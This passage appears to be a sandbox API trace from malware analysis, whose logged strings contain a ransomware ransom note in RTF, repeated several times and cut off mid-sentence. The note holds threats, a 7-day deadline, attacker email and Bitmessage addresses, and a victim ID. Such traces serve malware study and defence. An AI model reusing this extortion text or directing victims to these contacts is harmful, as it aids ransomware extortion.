ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.749] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.749] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think 